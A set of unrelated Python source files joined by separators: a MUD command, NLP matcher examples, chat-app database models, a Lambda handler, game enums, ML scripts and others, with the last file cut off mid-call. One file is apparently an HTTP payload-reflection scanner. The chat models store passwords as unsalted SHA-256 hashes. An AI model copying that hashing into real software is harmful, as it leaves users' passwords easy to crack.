"""Fichier contenant le paramètre 'carte' de la commande 'étendue'."""
from primaires.interpreteur.masque.parametre import Parametre
from primaires.salle.contextes.carte import CarteEtendue
class PrmCarte(Parametre):
"""Commande 'etendue carte'.
"""
def __init__(self):
"""Constructeur du paramètre"""
Parametre.__init__(self, "carte", "map")
self.schema = "<cle>"
self.aide_courte = "affiche la carte de l'étendue"
self.aide_longue = \
"Cette commande permet d'afficher un contexte représentant " \
"la carte (tronquée) de l'étendue. Les obstacles et les " \
"liens peuvent être édités simplement ici. Le contexte " \
"en lui-même propose beaucoup d'options et peut être " \
"difficile à manipuler pour commencer (certaines étendues " \
"sont bien plus grandes que la carte de base et il faut " \
"apprendre à naviguer dedans) mais de l'aide est mise à " \
"disposition pour vous aider à comprendre les différentes " \
"possibilités d'édition."
def interpreter(self, personnage, dic_masques):
"""Interprétation du paramètre"""
cle = dic_masques["cle"].cle
# On vérifie que cette étendue existe
if cle not in type(self).importeur.salle.etendues.keys():
personnage << "|err|Cette clé {} n'existe pas.|ff|".format(
repr(cle))
return
etendue = type(self).importeur.salle.etendues[cle]
if not personnage.salle.coords.valide:
personnage << "|err|La salle où vous vous trouvez n'a pas " \
"de coordonnées valides.|ff|"
return
x = int(personnage.salle.coords.x) - 15
y = int(personnage.salle.coords.y) - 8
contexte = CarteEtendue(personnage.instance_connexion, x, y)
contexte.etendue = etendue
personnage.contexte_actuel.migrer_contexte(contexte)
|
import spacy
# Import the Matcher
from spacy.matcher import Matcher
# Load a model and create the nlp object
nlp = spacy.load("en_core_web_sm")
# Add the pattern to the matcher
pattern = [{"TEXT": "iPhone"}, {"TEXT": "X"}]
# Process some text
doc = nlp("Upcoming iPhone X release date leaked")
def print_doc(doc, pattern):
# Initialize the matcher with the shared vocab
matcher = Matcher(nlp.vocab)
matcher.add("mypattern", [pattern])
# Call the matcher on the doc
matches = matcher(doc)
for match_id, start, end in matches:
matched_span = doc[start:end]
print(match_id, start, end)
print(matched_span)
print()
print_doc(doc, pattern)
pattern = [
{"IS_DIGIT":True},
{"LOWER":"fifa"},
{"LOWER":"world"},
{"LOWER":"cup"},
{"IS_PUNCT":True}
]
doc = nlp("2018 FIFA World Cup: France won!")
print_doc(doc, pattern)
pattern = [
{"LEMMA":"love", "POS": "VERB"},
{"POS":"NOUN"}
]
doc = nlp("I loved dogs but now I love cats more.")
print_doc(doc, pattern)
pattern = [
{"LEMMA": "buy"},
{"POS": "DET", "OP":"?"},
{"POS": "NOUN"}
]
doc = nlp("I bought a smartphone. Now I'm buying apps.")
print_doc(doc, pattern) |
import requests
import logging
import time
import json
from utils import *
class Executor():
def __init__(self):
pass
def execute(self, pre_request):
try:
for key, value in Config.static_cookies.items():
pre_request.cookies[key] = value
start = time.time()
# ======= START =======
if pre_request.req_type is "GET":
response = requests.get(
pre_request.destination,
headers=pre_request.headers,
cookies=pre_request.cookies
)
elif pre_request.req_type is "POST":
response = requests.post(
pre_request.destination,
headers=pre_request.headers,
cookies=pre_request.cookies,
data=pre_request.body
)
elif pre_request.req_type is "PUT":
response = requests.put(
pre_request.destination,
headers=pre_request.headers,
cookies=pre_request.cookies,
data=pre_request.body
)
elif pre_request.req_type is "PATCH":
response = requests.patch(
pre_request.destination,
headers=pre_request.headers,
cookies=pre_request.cookies,
data=pre_request.body
)
# ========= END =========
end = time.time()
if pre_request.expected_status_code in Config.http_codes:
expected_code_str = str(pre_request.expected_status_code) + " (" + Config.http_codes[pre_request.expected_status_code] +")"
else:
expected_code_str = str(pre_request.expected_status_code) + " (Unknown Code)"
if response.status_code in Config.http_codes:
response_code_str = str(response.status_code) + " (" + Config.http_codes[response.status_code] + ")"
else:
response_code_str = str(response.status_code) + " (" + response.reason + ")"
if str(response.status_code) in Config.exclude_code:
Config.logger.info("Returning because of exclude code: " + str(response.status_code))
return
if Config.include_code:
if str(response.status_code) not in Config.include_code:
Config.logger.info("Returning because of include code: " + str(response.status_code))
return
if response.status_code != pre_request.expected_status_code:
log_string = ""
log_string += "===============================================================================>>\n"
log_string += "Event Type: Server Response Changed" + "\n"
log_string += "Request Type: " + pre_request.req_type + "\n"
log_string += "Execution Time: " + str(end - start) + "\n"
log_string += "Expected Code: " + expected_code_str + "\n"
log_string += "Response Code: " + response_code_str + "\n"
log_string += "Payload: " + str(pre_request.payload) + "\n"
log_string += "Headers: " + str(pre_request.headers) + "\n"
log_string += "Cookies: " + str(pre_request.cookies) + "\n"
Config.logger.info(log_string)
if type(pre_request.payload) is dict:
for key, value in pre_request.payload.items():
if value in response.text and value not in Config.initial_response.text:
log_string = ""
log_string += "===============================================================================>>\n"
log_string += "Event Type: Reflective Header" + "\n"
log_string += "Request Type: " + pre_request.req_type + "\n"
log_string += "Execution Time: " + str(end - start) + "\n"
log_string += "Expected Code: " + expected_code_str + "\n"
log_string += "Response Code: " + response_code_str + "\n"
log_string += "Payload: " + str(key) + " : " + str(value) + "\n"
log_string += "Headers: " + str(pre_request.headers) + "\n"
log_string += "Cookies: " + str(pre_request.cookies) + "\n"
Config.logger.info(log_string)
else:
if pre_request.payload in response.text and pre_request.payload not in Config.initial_response.text:
log_string = ""
log_string += "===============================================================================>>\n"
log_string += "Event Type: Reflective Header" + "\n"
log_string += "Request Type: " + pre_request.req_type + "\n"
log_string += "Execution Time: " + str(end - start) + "\n"
log_string += "Expected Code: " + expected_code_str + "\n"
log_string += "Response Code: " + response_code_str + "\n"
log_string += "Payload: " + str(pre_request.payload) + "\n"
log_string += "Headers: " + str(pre_request.headers) + "\n"
log_string += "Cookies: " + str(pre_request.cookies) + "\n"
Config.logger.info(log_string)
except Exception:
Config.logger.debug("Error occured in executor function!", exc_info=True) |
"""
This module contains models in database, this module defines the
following classes:
- `ModelMixin`, base model mixin used in every other model;
- `User`, user model;
- `Chat`, chat model;
- `Message`, message model.
"""
from __future__ import annotations
from datetime import datetime as dt
from hashlib import sha256
from typing import Any, NoReturn, Optional, TypeVar, Type, Union
from sqlalchemy import (
Table, Column, Integer, ForeignKey, DateTime,
String, Enum, Boolean, desc, event
)
from sqlalchemy.engine import Engine
from sqlalchemy.ext.hybrid import hybrid_method, hybrid_property
from sqlalchemy.orm import backref, load_only, relationship, validates
from sqlalchemy.schema import CheckConstraint
from flask_sqlalchemy import BaseQuery
from shmelegram import db, utils
from shmelegram.config import ChatKind, BaseConfig
ModelType = TypeVar('ModelType', bound='ModelMixin')
ModelId = TypeVar('ModelId')
JsonDict = dict[str, Any]
@event.listens_for(Engine, "connect")
def set_sqlite_pragma(dbapi_connection, connection_record):
"""Enable foreign keys for SQLite testing database."""
# pylint: disable=unused-argument
if BaseConfig.TESTING:
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA foreign_keys=ON")
cursor.close()
chat_membership = Table(
'chat_membership', db.Model.metadata,
Column(
'chat_id', Integer, ForeignKey('chat.id', ondelete="CASCADE")
),
Column(
'user_id', Integer, ForeignKey('user.id', ondelete="CASCADE")
)
)
message_view = Table(
'message_view', db.Model.metadata,
Column(
'user_id', Integer, ForeignKey('user.id', ondelete="CASCADE")
),
Column(
'message_id', Integer,
ForeignKey('message.id', ondelete="CASCADE")
)
)
class ModelMixin:
"""
Basic ModelMixin containing different class utilities.
"""
@classmethod
def exists(cls, id_: ModelId) -> bool:
"""
Check if model with this id exists
Args:
id_ (int)
Returns:
bool
"""
return db.session.query(
cls.query.filter(cls.id == id_).exists()
).scalar()
def update(self, data: JsonDict) -> NoReturn:
"""
Update model according to dict data.
Args:
data (JsonDict): data to be updated
Returns:
NoReturn
"""
for key, value in data.items():
setattr(self, key, value)
db.session.add(self)
@classmethod
def get(cls: Type[ModelType], id_: ModelId) -> ModelType:
"""
Get model by some id
Args:
id_ (int): id of model to be retrieved
Raises:
ValueError: if model with such id does not exist.
Use `exists()` to check if the id exists
Returns:
db.Model: model
"""
model = cls.query.get(id_)
if model is None:
raise ValueError(f'{cls.__name__} with id {id_} does not exist')
return model
@classmethod
def get_or_none(cls: Type[ModelType], id_: ModelId) -> Optional[ModelType]:
"""
Get model by some id. If this id does not exist, return None
Args:
id_ (int): id of model to be retrieved
Returns:
db.Model: model
"""
return cls.query.get(id_)
def delete(self) -> NoReturn:
"""
Delete model from database and flush the database data.
Returns:
NoReturn
"""
db.session.delete(self)
db.session.flush()
def save(self) -> NoReturn:
"""
Save model to database and flush the database data.
Returns:
NoReturn
"""
db.session.add(self)
db.session.flush()
class User(db.Model, ModelMixin):
"""
Model representing user.
Arguments:
username (str): user's username. Unique.
password (str): is stored encrypted using sha256.
last_online (datetime, optional): last online UTC datetime. Defaults to `datetime.utcnow()`
"""
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
username = Column(String(30), unique=True, nullable=False)
password = Column(String(64), nullable=False)
last_online = Column(
DateTime(), default=dt.utcnow,
nullable=True, onupdate=dt.utcnow
) # None means online now
__table_args__ = (
CheckConstraint(
'length(username) > 4', name='username_min_length'
),
)
def __repr__(self) -> str:
return self.__class__.__name__ + (
f"(id={self.id}, username={self.username!r})"
)
def update_last_online(self) -> NoReturn:
"""
Update user's last online to current UTC and save model.
Returns:
NoReturn
"""
self.last_online = dt.utcnow()
self.save()
@classmethod
def get_by_username(cls, username: str, /) -> User:
"""
Get user by given username.
Args:
username (str): user with such username to be retrieved.
Raises:
ValueError: if such user does not exist
Returns:
User: user with given username
"""
user = cls.query.filter(cls.username == username).first()
if user is None:
raise ValueError(
f"{cls.__name__} with username {username!r} does not exist"
)
return user
@classmethod
def username_exists(cls, username: str, /) -> bool:
"""
Check if user with giver username exists.
Args:
username (str)
Returns:
bool
"""
return db.session.query(User.id).filter_by(
username=username).first() is not None
@classmethod
def startwith(cls, name: str = '', /, *, query: bool = False) -> Union[BaseQuery, list[User]]:
"""
Return all users with whose username startswith `name`.
Args:
name (str, optional): username start. Defaults to ''.
query (bool, optional): to return as `flas_sqlalchemy.BaseQuery`. Defaults to False.
Returns:
Union[BaseQuery, list[User]]
"""
users = cls.query.filter(
cls.username.startswith(name)
)
if not query:
users = users.all()
return users
@hybrid_method
def check_password(self, password: str) -> bool:
"""
Check if given password matches the user's password.
Args:
password (str)
Returns:
bool
"""
return sha256(password.encode('utf-8')).hexdigest() == self.password
@validates('username')
def validate_username(self, key: str, value: str) -> str:
"""
Validate username. Fires on every username update.
Args:
key (str): 'username'
value (str): username value
Raises:
ValueError: if username is invalid
Returns:
str: username value
"""
# pylint: disable=unused-argument
if not utils.validate_username(value):
raise ValueError('invalid username')
return value
@validates('password')
def validate_password(self, key: str, value: str) -> str:
"""
Validate password. Fires on every password update.
Args:
key (str): 'password'
value (str): password value
Raises:
ValueError: if password is invalid
Returns:
str: password value
"""
# pylint: disable=unused-argument
if not utils.validate_password(value):
raise ValueError('invalid password')
return sha256(value.encode('utf-8')).hexdigest()
class Message(db.Model, ModelMixin):
"""
Model representing message.
Arguments:
chat (Chat): chat which message belongs to
from_user (User): sender user
is_service (bool, optionsl), defaults to False.
text (str): message text
reply_to (Message): message which this message is reply to
created_at (datetime, optional), defaults to `datetime.utcnow()`
edited_at (datetime, optional), defaults to None
"""
__tablename__ = 'message'
id = Column(Integer, primary_key=True)
from_user_id = Column(Integer, ForeignKey('user.id'))
chat_id = Column(
Integer, ForeignKey('chat.id', ondelete="CASCADE")
)
is_service = Column(Boolean, nullable=False, default=False)
reply_to_id = Column(
Integer, ForeignKey('message.id', ondelete="SET NULL")
)
text = Column(String(4096), nullable=False)
created_at = Column(
DateTime(), default=dt.utcnow
)
edited_at = Column(
DateTime(), onupdate=dt.utcnow,
nullable=True, default=None
)
from_user = relationship(
'User', uselist=False, foreign_keys=[from_user_id]
)
seen_by = relationship(
'User', secondary=message_view, lazy='dynamic',
passive_deletes=True,
)
reply_to = relationship('Message', remote_side=[id])
@validates('seen_by', include_removes=True)
def validate_view(self, key: str, user: User, is_remove: bool) -> User:
"""
Validate view addition. Fires on every view addition or removal.
Args:
key (str): 'seen_by'
user (User): user to add the view from
is_remove (bool): whether this call is for removal
Raises:
ValueError: is_remove is True
ValueError: user is not member of message's chat
Returns:
User: user that was validate. Same user as the one passed in.
"""
# pylint: disable=unused-argument
if is_remove:
raise ValueError('not allowed to remove view')
if user not in self.chat.members:
raise ValueError('cannot add view by non-member user')
return user
@hybrid_method
def add_view(self, user: User) -> True:
"""
Add view to the message by user.
Args:
user (User): user to add the view from
Returns:
True
"""
self.seen_by.append(user)
return True
def __repr__(self) -> str:
return self.__class__.__name__ + (
f"(id={self.id}, chat={self.chat!r}, from_user={self.from_user!r})"
)
class Chat(db.Model, ModelMixin):
"""
Model representing chat.
Arguments:
kind (ChatKind): type of chat
title (str, optional): title for group chat
Raises:
ValueError: chat is private and has title, or chat is group and no title
"""
__tablename__ = 'chat'
id = Column(Integer, primary_key=True)
kind = Column(Enum(ChatKind))
title = Column(String(50), nullable=True)
members = relationship(
'User', secondary=chat_membership, passive_deletes=True,
backref=backref('chats', lazy='dynamic')
)
messages = relationship(
'Message', lazy='dynamic', backref='chat',
cascade="all,delete,delete-orphan",
passive_deletes=True, order_by=desc(Message.created_at)
)
def __init__(self, *, kind: ChatKind, title: str = None):
if kind is ChatKind.PRIVATE and title:
raise ValueError('unable to set title in private chat')
if kind is ChatKind.GROUP and not title:
raise ValueError('unable to create non-private chat without title')
super().__init__(kind=kind, title=title)
@validates('members')
def validate_member(self, key: str, user: User) -> User:
"""
Validate member. Fires on every member addition.
Args:
key (str): 'members'
user (User): user to be validated
Raises:
ValueError: new member count equals to member limit
Returns:
User: user that was validated. Same user as the one was passed.
"""
# pylint: disable=unused-argument
member_limit = self.member_limit
if self.member_count >= member_limit:
raise ValueError(
f'member count exceeds member limit ({member_limit})'
)
return user
@hybrid_property
def member_limit(self) -> int:
"""
Max member limit property.
Returns:
int
"""
return self.kind.value
@hybrid_property
def member_count(self) -> int:
"""
Current member count property.
Returns:
int
"""
return len(self.members)
def add_member(self, user: User) -> True:
"""
Add member to collection. See `validate_member` for errors.
Args:
user (User): user to be added.
Returns:
True
"""
self.members.append(user)
return True
def remove_member(self, user: User) -> True:
"""
Remove member from collection.
If no such user was located in members, ignores the call.
Args:
user (User): user to be added.
Returns:
True
"""
self.members.remove(user)
return True
def get_unread_messages(self, user: User) -> list[Message]:
"""
Get unread messages by a user.
If user not a member of a chat, raise ValueError
Args:
user (User): user to be checked
Returns:
list[Message]
"""
if user not in self.members:
raise ValueError('cannot get messages by non-member user')
return self.messages.filter(~Message.seen_by.any(User.id == user.id))\
.options(load_only("id")).all()
def get_private_title(self, user: User) -> str:
"""
Get private title for user.
Title for private chats is None, so the title has to be
retrieved as the companion user's username.
Args:
user (User): user for which the title is retrieved
Raises:
ValueError: chat type is not private
ValueError: user is not member of this chat
Returns:
str
"""
if self.kind is not ChatKind.PRIVATE:
raise ValueError("cannot get private title of non-private chat")
members = list(self.members)
if user not in members:
raise ValueError('cannot get title for non-member user')
members.remove(user)
return members[0].username
@classmethod
def get_by_title(cls, title: str, /) -> Chat:
"""
Get chat by total matching to given title.
Args:
title (str)
Raises:
ValueError: chat with such title does not exist
Returns:
Chat
"""
chat = cls.query.filter(cls.title == title).first()
if chat is None:
raise ValueError(
f'{cls.__name__} with title {title!r} does not exist'
)
return chat
@classmethod
def startwith(cls, name: str = '', /, *, query: bool = False) -> Union[BaseQuery, list[Chat]]:
"""
Get all chats whose title startwith `name`.
Since private chats has title of None, they are not included.
Args:
name (str, optional): start of the title. Defaults to ''.
query (bool, optional): to return as `sqlalchemy.BaseQuery`. Defaults to False.
Returns:
Union[flask_sqlalchemy.BaseQuery, list[Chat]]
"""
chats = cls.query.filter(
cls.title.startswith(name)
)
if not query:
chats = chats.all()
return chats
def __repr__(self) -> str:
return self.__class__.__name__ + (
f"(id={self.id}, kind={self.kind.name})"
)
|
# lc643.py
# LeetCode 643. Maximum Average Subarray I `E`
# 1sk | 98% | 9'
# A~0g17
class Solution:
def findMaxAverage(self, nums: List[int], k: int) -> float:
maxsum = cursum = sum(nums[0:k])
for i in range(len(nums)-k):
cursum += nums[i+k] - nums[i]
maxsum = max(cursum, maxsum)
return maxsum / k
|
import json
import boto3
import cattrs
from src.common.constants import NEWS_STORIES_TABLE_NAME, S3_BUCKET_NAME
from src.common.enums.api_response_codes import APIResponseCodes
from src.common.models.news_story import NewsStory
from src.common.services.dynamodb import DynamoDB
from src.common.services.lambda_ import Lambda
from src.common.services.logger import get_logger
LOGGER = get_logger()
def submit_news_story(event, context):
body = json.loads(event.get("body", None))
story = body.get("story", None)
is_64_encoded = event.get("is64Encoded", None)
thumbnail = body.get("thumbnail", None)
if story is None or is_64_encoded is None or thumbnail is None:
missing_keys = []
if story is None:
missing_keys.append("story")
if is_64_encoded is None:
missing_keys.append("is64Encoded")
if thumbnail is None:
missing_keys.append("thumbnail")
error_message = f"Event processed does not have keys: {missing_keys}"
LOGGER.error(error_message)
return Lambda.format_response(
status_code=APIResponseCodes.BAD_REQUEST, error_message=error_message
)
news_story = cattrs.structure(story, NewsStory)
s3 = boto3.resource("s3")
image_object = s3.Object(bucket_name=S3_BUCKET_NAME, key=news_story.thumbnail_key)
image_object.put(Body=thumbnail)
dynamo = DynamoDB(logger=LOGGER)
dynamo.put_item(table_name=NEWS_STORIES_TABLE_NAME, item=cattrs.unstructure(news_story))
story = cattrs.unstructure(news_story)
del story["thumbnail_key"]
story.update({"thumbnail": thumbnail})
return Lambda.format_response(status_code=APIResponseCodes.OK, response_message=story)
|
import sys
from socket import *
for line in sys.stdin:
if len(line) == 0: break
clientSocket = socket(AF_INET, SOCK_STREAM)
hostPort = 15132
host_name = "comp431bfa19"
clientSocket.connect((host_name, hostPort))
stream = clientSocket.makefile('rw')
# write the input line to the server
stream.write(line)
stream.flush()
# read the response lines from the server
numberOfLines = stream.readline()
for line in range(int(numberOfLines)):
response = stream.readline()
sys.stdout.write(response)
# close connection $
clientSocket.close()
sys.exit()
|
from enum import Enum
from collections import namedtuple
class PacketProvenance(Enum):
server = 0x01
client = 0x02
class EliteAbility(Enum):
stealth = 0x0001
low_vis = 0x0002
cloak = 0x0004
het = 0x0008
warp = 0x0010
teleport = 0x0020
tractor = 0x0040
drones = 0x0080
anti_mine = 0x0100
anti_torp = 0x0200
shield_drain = 0x0400
class GameType(Enum):
siege = 0
single_front = 1
double_front = 2
deep_strike = 3
peacetime = 4
border_war = 5
class Console(Enum):
main_screen = 0
helm = 1
weapons = 2
engineering = 3
science = 4
comms = 5
data = 6
observer = 7
captain_map = 8
game_master = 9
class ConsoleStatus(Enum):
available = 0
yours = 1
unavailable = 2
class ObjectType(Enum):
player_vessel = 1
weapons_console = 2
engineering_console = 3
other_ship = 4
base = 5
mine = 6
anomaly = 7
nebula = 9
torpedo = 10
blackhole = 11
asteroid = 12
mesh = 13
monster = 14
whale = 15
drone = 16
class DriveType(Enum):
warp = 0
jump = 1
class ShipType(Enum):
light_cruiser = 0
scout = 1
battleship = 2
missile_cruiser = 3
dreadnought = 4
ShipSettingsRecord = namedtuple('ShipSettingsRecord', 'drive type name')
class MainView(Enum):
forward = 0
port = 1
starboard = 2
aft = 3
tactical = 4
lrs = 5
status = 6
class TubeStatus(Enum):
unloaded = 0
loaded = 1
loading = 2
unloading = 3
class OrdnanceType(Enum):
missile = 0
nuke = 1
mine = 2
emp = 3
|
from random import randint
class Food:
def __init__(self, canvas, x, y, r=10, color="green", points=1, decay=0):
self.x = x
self.y = y
self.r = r
self.color = color
self.points = points
self.decay = decay
self.init_body(canvas)
def init_body(self, canvas):
self.circle = canvas.create_oval(self.x-self.r, self.y-self.r, self.x+self.r, self.y+self.r, fill=self.color)
def self_destruct(self, canvas):
canvas.delete(self.circle)
def get_coords(self):
return self.x, self.y
def end_epoch(self, canvas, new_x, new_y):
self.self_destruct(canvas)
self.x = new_x
self.y = new_y
self.init_body(canvas) |
import numpy as np
from keras import callbacks
from keras.optimizers import SGD
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import GridSearchCV
"""
This script is used to create models and determine hyperparameters
such as batch size, training epochs, and loss functions by gridsearch.
For this purpose, the Basemodel class is used to create models and the
TestSetCreator-class is used to load the data
"""
def create_model(optimizer='rmsprop', img_width=150, img_height=150):
convlayer1 = [16, 3, 3, 'relu', 2, 1]
convlayer2 = [16, 3, 3, 'relu', 2, 1]
convlayer3 = [16, 3, 3, 'relu', 0, 1]
convlayer4 = [16, 3, 3, 'relu', 2, 1]
convolutional_layers = []
convolutional_layers.append(convlayer1)
convolutional_layers.append(convlayer2)
convolutional_layers.append(convlayer3)
convolutional_layers.append(convlayer4)
fully_connceted_layers = []
fc1 = [128, 'relu', .2]
fc2 = [64, 'relu', .1]
fully_connceted_layers.append(fc1)
fully_connceted_layers.append(fc2)
from testcode.base_model import BaseModel
model_creator = BaseModel()
model = model_creator.createModel(img_width, img_height, 1, convolutional_layers, fully_connceted_layers)
model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
return model
def create_dataset(data_dir, img_width, img_height):
from utils.create_test_sets import TestSetCreator
testset_creator = TestSetCreator()
images, labels = testset_creator.load_data(data_dir, img_width, img_height)
images, labels = testset_creator.normalize_data(images, labels)
X_train, X_test, y_train, y_test = testset_creator.cross_validate(images, labels, 0)
return X_train, y_train
def create_callbacks():
reduce_lr = callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.20,
patience=5, min_lr=0.00001)
tensorboard = callbacks.TensorBoard(log_dir='./logs',
histogram_freq=0,
batch_size=16,
embeddings_freq=0,
embeddings_layer_names=None,
embeddings_metadata=None)
return [reduce_lr, tensorboard]
X_train, y_train = create_dataset('C:\\tmp\\test', 150, 150)
model = KerasClassifier(build_fn=create_model, verbose=0)
# define Hyperparamter to Test in Gridsearch
optimizers = [SGD(lr=0.001, momentum=0.9), 'adam']
epochs = [100, 200, 300]
batches = [8, 16, 32, 64]
param_grid = dict(optimizer=optimizers, epochs=epochs, batch_size=batches)
grid = GridSearchCV(estimator=model, param_grid=param_grid)
grid_result = grid.fit(X_train, y_train)
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Matrix compression operator.
Helper functions to have an automated process to take any matrix compression
algorithm and create a tensorflow operator that can be applied on a tensorflow
matrix variable to compress it on the fly during training.
The class MatrixCompressorInferface can be used to implement any matrix
compression algorithm in the method static_matrix_compressor. The other class
CompressionOpInterface is used to create a tensorflow operator that injects
any matrix compression method dynamically into a tensorflow layer. This is
done by specifying in the spec during initialization a
MatrixCompressorInferface object that implements the method.
The get_apply_compression_op return such a tensorflow operator.
Further a tensorflow operator to update variables needs to be invoked
periodically depending on the method. Such an operator is created using
the get_update_op method.
Derived classes of these interfaces can be used to create compression OPs that
implement different compression methods. Such OPs have been implemented using
derived classes such as LowRankDecompMatrixCompressor, CompressionOp for low
rank decomposition, SimhashMatrixCompressor, SimhashCompressionOp for simhash,
DLMatrixCompressor for dictionary learning.
"""
import copy
from absl import logging
import numpy as np
from tensor2tensor.utils.hparam import HParams
import tensorflow.compat.v2 as tf
class MatrixCompressorInferface(object):
"""Interface for any matrix compressor algorithm.
This MatrixCompressorInferface class can be implemented by any third party to
implement any compression algorithm.
"""
def __init__(self, spec):
pass
def static_matrix_compressor(self, a_matrix):
"""Implements the matrix compression algorithm of choice to compress.
Args:
a_matrix: input matrix.
Returns:
The factor(s) or any compressed representation of a_matrix.
"""
raise NotImplementedError()
def default_matrix(self):
"""Returns default matrix for initialization.
Size is taken from spec.
"""
raise NotImplementedError()
class LowRankDecompMatrixCompressor(MatrixCompressorInferface):
"""Low rank decomposition compressor.
Implements matrix compression interface for the low rank decomposition
algorithm.
"""
def __init__(self, spec):
"""Initializer.
Args:
spec: hparams object with default value given by
self.get_default_hparams().
"""
super(LowRankDecompMatrixCompressor, self).__init__(spec)
self._spec = spec
self.uncompressed_size = 0
self.compressed_size = 0
def get_spec(self):
return self._spec
@staticmethod
def get_default_hparams():
"""Get a tf.HParams object with the default values for the hyperparameters.
name: string
name of the low-rank matrix decompressor specification.
rank: integer
rank of the low-rank decomposition that is performed.
compressor_option: integer
indicates what type of factorization (if any) is used.
is_b_matrix_trainable: bool
indicates whether the b_matrix matrix in the factorization is to be
trained.
is_c_matrix_trainable: bool
indicates whether the c_matrix matrix in the factorization is to be
trained.
Returns:
tf.HParams object initialized to default values.
"""
return HParams(
name='model_compression',
rank=100,
num_rows=10,
num_cols=10,
use_tpu=False,
compressor_option=0,
is_b_matrix_trainable=True,
is_c_matrix_trainable=True,
is_c_matrix_present=True,
block_size=1,
pruning_fraction=0.0,
use_lsh=False)
def static_matrix_compressor(self, a_matrix):
"""Low-rank decomposition of a_matrix.
Args:
a_matrix: input matrix.
Returns:
A list [b_matrix,c_matrix] which is the low-rank decomposition of
a_matrix. Rank is taken from spec.rank.
"""
u, s, vh = np.linalg.svd(a_matrix)
# If matrix dimension is smaller than rank specified then adjust rank
rank = max(min(np.min(a_matrix.shape), self._spec.rank), 1)
# rank = comp_op_utils.compute_compressed_rank_from_matrix_shape(
# a_matrix.shape, self._spec.rank)
b_matrix = u[:, :rank]
c_matrix = vh[:rank, :]
s_mat = np.diag(np.sqrt(s[:rank]))
b_matrix = np.matmul(b_matrix, s_mat)
c_matrix = np.matmul(s_mat, c_matrix)
logging.info(
'Inside static_matrix_compressor: a_matrix,b_matrix,c_matrix shapes '
'are: %s, %s, %s', a_matrix.shape, b_matrix.shape, c_matrix.shape)
self.uncompressed_size = tf.size(a_matrix)
self.compressed_size = b_matrix.size + c_matrix.size
return [b_matrix, c_matrix]
class CompressionOpInterface(object):
"""Interface for a compression op.
Class to take a matrix compression algorithm and create a tensorflow
compression operator to inject that compression dynamically during training.
The compression algorithm is specified using an object of
MatrixCompressorInferface class.
"""
def __init__(self, scope='default_scope', spec=None, global_step=None):
pass
def get_apply_compression_op(self,
a_matrix_tfvar,
matrix_compressor,
scope='default_scope'):
"""Returns compressed tensorflow operator.
Does it for variable a_matrix_tfvar for compression method specified in
matrix_compressor.
Args:
a_matrix_tfvar: TF variable representing a tensor variable in a model.
matrix_compressor: MatrixCompressorInferface object to specify the
compression algorithm.
scope: TF scope used for creating new TF variables.
Returns:
A TF node that has the compressed version of a_matrix_tfvar.
"""
raise NotImplementedError()
def get_update_op(self):
"""Update operator.
Returns:
TF operator that implements the update steps that may need to
be applied periodically.
"""
raise NotImplementedError()
class CompressionOp(CompressionOpInterface):
"""Implements a compression OP.
Does this based on any matrix factorization compression algorithm by
replacing a variable a_matrix by alpha*a_matrix +
(1-alpha)b_matrix*c_matrix. See the doc linked in the directory README for
details.
"""
def __init__(self,
scope='default_scope',
spec=None,
global_step=None,
layer=None):
"""Initializer.
Args:
scope: TF scope used for creating new TF variables.
spec: compression hyper parameters default value given by
self.get_default_hparams().
global_step: tf variable that has the global step.
layer: Layer to compress.
"""
super(CompressionOp, self).__init__(scope, spec, global_step)
# Compression specification
self._spec = spec
# Sanity check for compression hparams
self._validate_spec()
self._global_step = global_step
# public member variables to track the compressor, the variables and
# other tf nodes corresponding to this OP.
self.matrix_compressor = None
self.a_matrix_tfvar = None
self.b_matrix_tfvar = None
self.c_matrix_tfvar = None
self.alpha = None
self.layer = layer
self.last_alpha_update_step = None
self.uncompressed_size = 0
self.compressed_size = 0
@staticmethod
def get_default_hparams():
"""Get a tf.HParams object with the default values for the hyperparameters.
name: string
name of the compression specification. Used for adding summaries and ops
under a common tensorflow name_scope.
alpha_decrement_value: float
a positive real number by which alpha is decremented at each update.
begin_compression_step: integer
the global step at which to begin compression.
end_compression_step: integer
the global step at which to terminate compression. Defaults to -1
implying that compression continues till the training stops.
use_tpu: False
indicates whether to use TPU.
compression_option: integer
indicates what type of factorization (if any) is used.
rank: integer
indicates what type of factorization (if any) is used.
update_option: integer
indicates how the update logic is being run. More specifically:
0 - run the update logic in TF; needed when using GPU/TPU.
1 - run the update logic in regular python as opposed to TF.
2 - run the update logic in TF and in regular python.
Returns:
tf.HParams object initialized to default values.
"""
return HParams(
name='model_compression',
alpha_decrement_value=0.01,
begin_compression_step=0,
end_compression_step=-1,
compression_frequency=10,
use_tpu=False,
compression_option=0,
rank=100,
update_option=0,
run_update_interval_check=1,
block_size=1,
pruning_fraction=0.0,
begin_pruning_step=0,
end_pruning_step=-1,
weight_sparsity_map=[''],
block_dims_map=[''],
threshold_decay=0.0,
pruning_frequency=10,
nbins=256,
block_height=1,
block_width=1,
block_pooling_function='AVG',
initial_sparsity=0.0,
target_sparsity=0.5,
sparsity_function_begin_step=0,
sparsity_function_end_step=100,
sparsity_function_exponent=3.0,
gradient_decay_rate=0.99,
prune_option='weight')
def setup_variables(self, a_matrix_tfvar, matrix_compressor, layer):
"""Create compressed layer weight matrices."""
self.matrix_compressor = matrix_compressor
a_matrix = np.zeros(shape=a_matrix_tfvar.shape)
[b_matrix, c_matrix] = matrix_compressor.static_matrix_compressor(a_matrix)
self.b_matrix_tfvar = layer.add_weight(
'b_matrix',
shape=b_matrix.shape,
initializer=layer.kernel_initializer,
regularizer=layer.kernel_regularizer,
constraint=layer.kernel_constraint,
dtype=layer.dtype,
trainable=True)
self.c_matrix_tfvar = layer.add_weight(
